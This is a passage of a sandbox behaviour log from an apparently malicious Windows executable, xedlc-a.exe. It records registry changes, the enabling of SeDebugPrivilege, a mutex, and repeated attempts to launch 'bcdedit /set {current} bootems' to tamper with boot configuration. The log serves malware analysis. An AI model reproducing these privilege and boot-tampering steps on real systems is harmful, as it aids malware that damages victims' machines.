41705.            param (id:2): 261
41706.        apicall:
41707.          timestamp: 49819
41708.          sequenceNumber: 231
41709.          processinfo:
41710.            pid: 1056
41711.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41712.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41713.          dllname: kernel32.dll
41714.          apiname: GetSystemDirectoryW
41715.          address: 0x763982be
41716.          params:
41717.            param (id:1): 0xd3f1b8
41718.            param (id:2): 260
41719.        file:
41720.          timestamp: 49826
41721.          mode: failed
41722.          sequenceNumber: 232
41723.          value: C:\Documents and Settings\admin\Application Data\MSVFW32.dll
41724.          processinfo:
41725.            tainted: true
41726.            pid: 1056
41727.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41728.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41729.            ads:
41730.          fid (ads:): 0
41731.          failure: open
41732.          ntstatus: 0xc0000034
41733.          CreateOptions: 0x200000
41734.          PE:
41735.            InspectionType: Ext
41736.        regkey:
41737.          timestamp: 49831
41738.          mode: added
41739.          sequenceNumber: 233
41740.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
41741.          processinfo:
41742.            pid: 1056
41743.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41744.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41745.        regkey:
41746.          timestamp: 49835
41747.          mode: setval
41748.          sequenceNumber: 234
41749.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"CD Burning" = C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\CD Burning
41750.           processinfo:
41751.             pid: 1056
41752.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41753.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41754.         regkey:
41755.           timestamp: 49841
41756.           mode: added
41757.           sequenceNumber: 235
41758.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
41759.           processinfo:
41760.             pid: 1056
41761.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41762.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41763.         folder:
41764.           timestamp: 49847
41765.           mode: open
41766.           sequenceNumber: 236
41767.           value: C:\Documents and Settings\admin\My Documents
41768.           processinfo:
41769.             pid: 1056
41770.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41771.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41772.           ntstatus: 0x0
41773.           CreateOptions: 0x200000
41774.         regkey:
41775.           timestamp: 49850
41776.           mode: added
41777.           sequenceNumber: 237
41778.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
41779.           processinfo:
41780.             pid: 1056
41781.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41782.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41783.         regkey:
41784.           timestamp: 49853
41785.           mode: setval
41786.           sequenceNumber: 238
41787.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Personal" = C:\Documents and Settings\admin\My Documents
41788.          processinfo:
41789.            pid: 1056
41790.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41791.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41792.        regkey:
41793.          timestamp: 49858
41794.          mode: added
41795.          sequenceNumber: 239
41796.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
41797.          processinfo:
41798.            pid: 1056
41799.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41801.        regkey:
41802.          timestamp: 49862
41803.          mode: added
41804.          sequenceNumber: 240
41805.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
41806.          processinfo:
41807.            pid: 1056
41808.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41809.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41810.        regkey:
41811.          timestamp: 49866
41812.          mode: setval
41813.          sequenceNumber: 241
41814.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
41815.           processinfo:
41816.             pid: 1056
41817.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41818.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41819.         regkey:
41820.           timestamp: 49870
41821.           mode: added
41822.           sequenceNumber: 242
41823.           value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
41824.           processinfo:
41825.             pid: 1056
41826.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41827.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41828.         regkey:
41829.           timestamp: 49874
41830.           mode: added
41831.           sequenceNumber: 243
41832.           value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
41833.           processinfo:
41834.             pid: 1056
41835.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41836.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41837.         regkey:
41838.           timestamp: 49878
41839.           mode: setval
41840.           sequenceNumber: 244
41841.           value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Desktop" = C:\Documents and Settings\All Users\Desktop
41842.          processinfo:
41843.            pid: 1056
41844.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41846.        regkey:
41847.          timestamp: 49882
41848.          mode: added
41849.          sequenceNumber: 245
41850.          value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
41851.          processinfo:
41852.            pid: 1056
41853.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41854.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41855.        regkey:
41856.          timestamp: 49886
41857.          mode: setval
41858.          sequenceNumber: 246
41859.          value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData" = C:\Documents and Settings\All Users\Application Data
41860.           processinfo:
41861.             pid: 1056
41862.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41863.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41864.         apicall:
41865.           timestamp: 49891
41866.           sequenceNumber: 247
41867.           processinfo:
41868.             pid: 1056
41869.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41870.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41871.           dllname: ntdll.dll
41872.           apiname: NtAdjustPrivilegesToken
41873.           address: 0x77ddf01a
41874.           params:
41875.             param (id:1): SeDebugPrivilege
41876.             param (id:2): Enabled
41877.         apicall:
41878.           timestamp: 49895
41879.           sequenceNumber: 248
41880.           processinfo:
41881.             pid: 1056
41882.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41883.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41884.           dllname: advapi32.dll
41885.           apiname: GetTokenInformation
41886.           address: 0x0041e684
41887.           params:
41888.             param (id:1): 0x1b4
41889.             param (id:2): 0x19
41890.         apicall:
41891.           timestamp: 49899
41892.           sequenceNumber: 249
41893.           processinfo:
41894.             pid: 1056
41895.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41896.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41897.           dllname: kernel32.dll
41898.           apiname: Sleep
41899.           address: 0x0042207d
41900.           params:
41901.             param (id:1): 15
41902.         apicall:
41903.           timestamp: 49902
41904.           sequenceNumber: 250
41905.           processinfo:
41906.             pid: 1056
41907.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41908.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41909.           dllname: kernel32.dll
41910.           apiname: Sleep
41911.           address: 0x0042207d
41912.           params:
41913.             param (id:1): 15
41914.         apicall:
41915.           timestamp: 49918
41916.           sequenceNumber: 251
41917.           processinfo:
41918.             pid: 1056
41919.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41920.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41921.           dllname: kernel32.dll
41922.           apiname: Sleep
41923.           address: 0x0042207d
41924.           params:
41925.             param (id:1): 15
41926.         apicall:
41927.           timestamp: 49934
41928.           sequenceNumber: 252
41929.           processinfo:
41930.             pid: 1056
41931.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41932.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41933.           dllname: kernel32.dll
41934.           apiname: Sleep
41935.           address: 0x0042207d
41936.           params:
41937.             param (id:1): 15
41938.         apicall:
41939.           timestamp: 49950
41940.           sequenceNumber: 253
41941.           processinfo:
41942.             pid: 1056
41943.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41944.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41945.           dllname: kernel32.dll
41946.           apiname: Sleep
41947.           address: 0x0042207d
41948.           params:
41949.             param (id:1): 15
41950.         mutex:
41951.           timestamp: 49965
41952.           sequenceNumber: 254
41953.           value: \BaseNamedObjects\78456214324124
41954.           processinfo:
41955.             pid: 1056
41956.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41957.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41958.         file:
41959.           timestamp: 49970
41960.           mode: failed
41961.           sequenceNumber: 255
41962.           value: C:\Documents and Settings\admin\Application Data\bcdedit.exe
41963.           processinfo:
41964.             tainted: true
41965.             pid: 1056
41966.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41967.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41968.             ads:
41969.           fid (ads:): 0
41970.           failure: open
41971.           ntstatus: 0xc0000034
41972.           CreateOptions: 0x200000
41973.           PE:
41974.             InspectionType: Ext
41975.         file:
41976.           timestamp: 49976
41977.           mode: failed
41978.           sequenceNumber: 256
41979.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe
41980.           processinfo:
41981.             tainted: true
41982.             pid: 1056
41983.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41984.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41985.             ads:
41986.           fid (ads:): 0
41987.           failure: open
41988.           ntstatus: 0xc0000034
41989.           CreateOptions: 0x200000
41990.           PE:
41991.             InspectionType: Ext
41992.         file:
41993.           timestamp: 49987
41994.           mode: failed
41995.           sequenceNumber: 257
41996.           value: C:\WINDOWS\system32\bcdedit.exe
41997.           processinfo:
41998.             tainted: true
41999.             pid: 1056
42000.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42001.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42002.             ads:
42003.           fid (ads:): 0
42004.           failure: open
42005.           ntstatus: 0xc0000034
42006.           CreateOptions: 0x200000
42007.           PE:
42008.             InspectionType: Ext
42009.         file:
42010.           timestamp: 49992
42011.           mode: failed
42012.           sequenceNumber: 258
42013.           value: C:\WINDOWS\system\bcdedit.exe
42014.           processinfo:
42015.             tainted: true
42016.             pid: 1056
42017.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42018.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42019.             ads:
42020.           fid (ads:): 0
42021.           failure: open
42022.           ntstatus: 0xc0000034
42023.           CreateOptions: 0x200000
42024.           PE:
42025.             InspectionType: Ext
42026.         file:
42027.           timestamp: 49997
42028.           mode: failed
42029.           sequenceNumber: 259
42030.           value: C:\WINDOWS\bcdedit.exe
42031.           processinfo:
42032.             tainted: true
42033.             pid: 1056
42034.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42035.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42036.             ads:
42037.           fid (ads:): 0
42038.           failure: open
42039.           ntstatus: 0xc0000034
42040.           CreateOptions: 0x200000
42041.           PE:
42042.             InspectionType: Ext
42043.         file:
42044.           timestamp: 50001
42045.           mode: failed
42046.           sequenceNumber: 260
42047.           value: C:\WINDOWS\system32\wbem\bcdedit.exe
42048.           processinfo:
42049.             tainted: true
42050.             pid: 1056
42051.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42052.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42053.             ads:
42054.           fid (ads:): 0
42055.           failure: open
42056.           ntstatus: 0xc0000034
42057.           CreateOptions: 0x200000
42058.           PE:
42059.             InspectionType: Ext
42060.         file:
42061.           timestamp: 50005
42062.           mode: failed
42063.           sequenceNumber: 261
42064.           value: C:\Program Files\QuickTime\QTSystem\bcdedit.exe
42065.           processinfo:
42066.             tainted: true
42067.             pid: 1056
42068.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42069.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42070.             ads:
42071.           fid (ads:): 0
42072.           failure: open
42073.           ntstatus: 0xc0000034
42074.           CreateOptions: 0x200000
42075.           PE:
42076.             InspectionType: Ext
42077.         file:
42078.           timestamp: 50010
42079.           mode: failed
42080.           sequenceNumber: 262
42081.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\bcdedit.exe
42082.           processinfo:
42083.             tainted: true
42084.             pid: 1056
42085.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42086.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42087.             ads:
42088.           fid (ads:): 0
42089.           failure: open
42090.           ntstatus: 0xc0000034
42091.           CreateOptions: 0x200000
42092.           PE:
42093.             InspectionType: Ext
42094.         file:
42095.           timestamp: 50015
42096.           mode: failed
42097.           sequenceNumber: 263
42098.           value: C:\Program Files\Debugging Tools for Windows (x86)\bcdedit.exe
42099.           processinfo:
42100.             tainted: true
42101.             pid: 1056
42102.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42103.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42104.             ads:
42105.           fid (ads:): 0
42106.           failure: open
42107.           ntstatus: 0xc0000034
42108.           CreateOptions: 0x200000
42109.           PE:
42110.             InspectionType: Ext
42111.         file:
42112.           timestamp: 50019
42113.           mode: failed
42114.           sequenceNumber: 264
42115.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET.EXE
42116.           processinfo:
42117.             tainted: true
42118.             pid: 1056
42119.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42120.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42121.             ads:
42122.           fid (ads:): 0
42123.           failure: open
42124.           ntstatus: 0xc000003a
42125.           CreateOptions: 0x200000
42126.           PE:
42127.             InspectionType: Ext
42128.         file:
42129.           timestamp: 50024
42130.           mode: failed
42131.           sequenceNumber: 265
42132.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set.exe
42133.           processinfo:
42134.             tainted: true
42135.             pid: 1056
42136.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42137.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42138.             ads:
42139.           fid (ads:): 0
42140.           failure: open
42141.           ntstatus: 0xc000003a
42142.           CreateOptions: 0x200000
42143.           PE:
42144.             InspectionType: Ext
42145.         file:
42146.           timestamp: 50029
42147.           mode: failed
42148.           sequenceNumber: 266
42149.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET.EXE
42150.           processinfo:
42151.             tainted: true
42152.             pid: 1056
42153.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42154.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42155.             ads:
42156.           fid (ads:): 0
42157.           failure: open
42158.           ntstatus: 0xc000003a
42159.           CreateOptions: 0x200000
42160.           PE:
42161.             InspectionType: Ext
42162.         file:
42163.           timestamp: 50034
42164.           mode: failed
42165.           sequenceNumber: 267
42166.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET.EXE
42167.           processinfo:
42168.             tainted: true
42169.             pid: 1056
42170.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42171.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42172.             ads:
42173.           fid (ads:): 0
42174.           failure: open
42175.           ntstatus: 0xc000003a
42176.           CreateOptions: 0x200000
42177.           PE:
42178.             InspectionType: Ext
42179.         file:
42180.           timestamp: 50038
42181.           mode: failed
42182.           sequenceNumber: 268
42183.           value: C:\WINDOWS\BCDEDIT.EXE \SET.EXE
42184.           processinfo:
42185.             tainted: true
42186.             pid: 1056
42187.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42188.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42189.             ads:
42190.           fid (ads:): 0
42191.           failure: open
42192.           ntstatus: 0xc000003a
42193.           CreateOptions: 0x200000
42194.           PE:
42195.             InspectionType: Ext
42196.         file:
42197.           timestamp: 50044
42198.           mode: failed
42199.           sequenceNumber: 269
42200.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET.EXE
42201.           processinfo:
42202.             tainted: true
42203.             pid: 1056
42204.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42205.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42206.             ads:
42207.           fid (ads:): 0
42208.           failure: open
42209.           ntstatus: 0xc000003a
42210.           CreateOptions: 0x200000
42211.           PE:
42212.             InspectionType: Ext
42213.         file:
42214.           timestamp: 50050
42215.           mode: failed
42216.           sequenceNumber: 270
42217.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET.EXE
42218.           processinfo:
42219.             tainted: true
42220.             pid: 1056
42221.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42222.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42223.             ads:
42224.           fid (ads:): 0
42225.           failure: open
42226.           ntstatus: 0xc000003a
42227.           CreateOptions: 0x200000
42228.           PE:
42229.             InspectionType: Ext
42230.         file:
42231.           timestamp: 50057
42232.           mode: failed
42233.           sequenceNumber: 271
42234.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET.EXE
42235.           processinfo:
42236.             tainted: true
42237.             pid: 1056
42238.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42239.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42240.             ads:
42241.           fid (ads:): 0
42242.           failure: open
42243.           ntstatus: 0xc000003a
42244.           CreateOptions: 0x200000
42245.           PE:
42246.             InspectionType: Ext
42247.         file:
42248.           timestamp: 50062
42249.           mode: failed
42250.           sequenceNumber: 272
42251.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET.EXE
42252.           processinfo:
42253.             tainted: true
42254.             pid: 1056
42255.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42256.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42257.             ads:
42258.           fid (ads:): 0
42259.           failure: open
42260.           ntstatus: 0xc000003a
42261.           CreateOptions: 0x200000
42262.           PE:
42263.             InspectionType: Ext
42264.         file:
42265.           timestamp: 50067
42266.           mode: failed
42267.           sequenceNumber: 273
42268.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT}.EXE
42269.           processinfo:
42270.             tainted: true
42271.             pid: 1056
42272.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42273.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42274.             ads:
42275.           fid (ads:): 0
42276.           failure: open
42277.           ntstatus: 0xc000003a
42278.           CreateOptions: 0x200000
42279.           PE:
42280.             InspectionType: Ext
42281.         file:
42282.           timestamp: 50072
42283.           mode: failed
42284.           sequenceNumber: 274
42285.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current}.exe
42286.           processinfo:
42287.             tainted: true
42288.             pid: 1056
42289.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42290.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42291.             ads:
42292.           fid (ads:): 0
42293.           failure: open
42294.           ntstatus: 0xc000003a
42295.           CreateOptions: 0x200000
42296.           PE:
42297.             InspectionType: Ext
42298.         file:
42299.           timestamp: 50078
42300.           mode: failed
42301.           sequenceNumber: 275
42302.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT}.EXE
42303.           processinfo:
42304.             tainted: true
42305.             pid: 1056
42306.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42307.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42308.             ads:
42309.           fid (ads:): 0
42310.           failure: open
42311.           ntstatus: 0xc000003a
42312.           CreateOptions: 0x200000
42313.           PE:
42314.             InspectionType: Ext
42315.         file:
42316.           timestamp: 50083
42317.           mode: failed
42318.           sequenceNumber: 276
42319.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT}.EXE
42320.           processinfo:
42321.             tainted: true
42322.             pid: 1056
42323.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42324.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42325.             ads:
42326.           fid (ads:): 0
42327.           failure: open
42328.           ntstatus: 0xc000003a
42329.           CreateOptions: 0x200000
42330.           PE:
42331.             InspectionType: Ext
42332.         file:
42333.           timestamp: 50087
42334.           mode: failed
42335.           sequenceNumber: 277
42336.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT}.EXE
42337.           processinfo:
42338.             tainted: true
42339.             pid: 1056
42340.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42341.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42342.             ads:
42343.           fid (ads:): 0
42344.           failure: open
42345.           ntstatus: 0xc000003a
42346.           CreateOptions: 0x200000
42347.           PE:
42348.             InspectionType: Ext
42349.         file:
42350.           timestamp: 50094
42351.           mode: failed
42352.           sequenceNumber: 278
42353.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT}.EXE
42354.           processinfo:
42355.             tainted: true
42356.             pid: 1056
42357.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42358.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42359.             ads:
42360.           fid (ads:): 0
42361.           failure: open
42362.           ntstatus: 0xc000003a
42363.           CreateOptions: 0x200000
42364.           PE:
42365.             InspectionType: Ext
42366.         file:
42367.           timestamp: 50099
42368.           mode: failed
42369.           sequenceNumber: 279
42370.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT}.EXE
42371.           processinfo:
42372.             tainted: true
42373.             pid: 1056
42374.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42375.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42376.             ads:
42377.           fid (ads:): 0
42378.           failure: open
42379.           ntstatus: 0xc000003a
42380.           CreateOptions: 0x200000
42381.           PE:
42382.             InspectionType: Ext
42383.         file:
42384.           timestamp: 50104
42385.           mode: failed
42386.           sequenceNumber: 280
42387.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT}.EXE
42388.           processinfo:
42389.             tainted: true
42390.             pid: 1056
42391.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42392.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42393.             ads:
42394.           fid (ads:): 0
42395.           failure: open
42396.           ntstatus: 0xc000003a
42397.           CreateOptions: 0x200000
42398.           PE:
42399.             InspectionType: Ext
42400.         file:
42401.           timestamp: 50110
42402.           mode: failed
42403.           sequenceNumber: 281
42404.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT}.EXE
42405.           processinfo:
42406.             tainted: true
42407.             pid: 1056
42408.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42409.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42410.             ads:
42411.           fid (ads:): 0
42412.           failure: open
42413.           ntstatus: 0xc000003a
42414.           CreateOptions: 0x200000
42415.           PE:
42416.             InspectionType: Ext
42417.         file:
42418.           timestamp: 50115
42419.           mode: failed
42420.           sequenceNumber: 282
42421.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42422.           processinfo:
42423.             tainted: true
42424.             pid: 1056
42425.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42426.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42427.             ads:
42428.           fid (ads:): 0
42429.           failure: open
42430.           ntstatus: 0xc000003a
42431.           CreateOptions: 0x200000
42432.           PE:
42433.             InspectionType: Ext
42434.         file:
42435.           timestamp: 50121
42436.           mode: failed
42437.           sequenceNumber: 283
42438.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootems.exe
42439.           processinfo:
42440.             tainted: true
42441.             pid: 1056
42442.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42443.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42444.             ads:
42445.           fid (ads:): 0
42446.           failure: open
42447.           ntstatus: 0xc000003a
42448.           CreateOptions: 0x200000
42449.           PE:
42450.             InspectionType: Ext
42451.         file:
42452.           timestamp: 50126
42453.           mode: failed
42454.           sequenceNumber: 284
42455.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42456.           processinfo:
42457.             tainted: true
42458.             pid: 1056
42459.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42460.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42461.             ads:
42462.           fid (ads:): 0
42463.           failure: open
42464.           ntstatus: 0xc000003a
42465.           CreateOptions: 0x200000
42466.           PE:
42467.             InspectionType: Ext
42468.         file:
42469.           timestamp: 50132
42470.           mode: failed
42471.           sequenceNumber: 285
42472.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42473.           processinfo:
42474.             tainted: true
42475.             pid: 1056
42476.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42477.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42478.             ads:
42479.           fid (ads:): 0
42480.           failure: open
42481.           ntstatus: 0xc000003a
42482.           CreateOptions: 0x200000
42483.           PE:
42484.             InspectionType: Ext
42485.         file:
42486.           timestamp: 50137
42487.           mode: failed
42488.           sequenceNumber: 286
42489.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42490.           processinfo:
42491.             tainted: true
42492.             pid: 1056
42493.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42494.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42495.             ads:
42496.           fid (ads:): 0
42497.           failure: open
42498.           ntstatus: 0xc000003a
42499.           CreateOptions: 0x200000
42500.           PE:
42501.             InspectionType: Ext
42502.         file:
42503.           timestamp: 50144
42504.           mode: failed
42505.           sequenceNumber: 287
42506.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42507.           processinfo:
42508.             tainted: true
42509.             pid: 1056
42510.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42511.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42512.             ads:
42513.           fid (ads:): 0
42514.           failure: open
42515.           ntstatus: 0xc000003a
42516.           CreateOptions: 0x200000
42517.           PE:
42518.             InspectionType: Ext
42519.         file:
42520.           timestamp: 50149
42521.           mode: failed
42522.           sequenceNumber: 288
42523.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42524.           processinfo:
42525.             tainted: true
42526.             pid: 1056
42527.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42528.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42529.             ads:
42530.           fid (ads:): 0
42531.           failure: open
42532.           ntstatus: 0xc000003a
42533.           CreateOptions: 0x200000
42534.           PE:
42535.             InspectionType: Ext
42536.         file:
42537.           timestamp: 50155
42538.           mode: failed
42539.           sequenceNumber: 289
42540.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42541.           processinfo:
42542.             tainted: true
42543.             pid: 1056
42544.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42545.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42546.             ads:
42547.           fid (ads:): 0
42548.           failure: open
42549.           ntstatus: 0xc000003a
42550.           CreateOptions: 0x200000
42551.           PE:
42552.             InspectionType: Ext
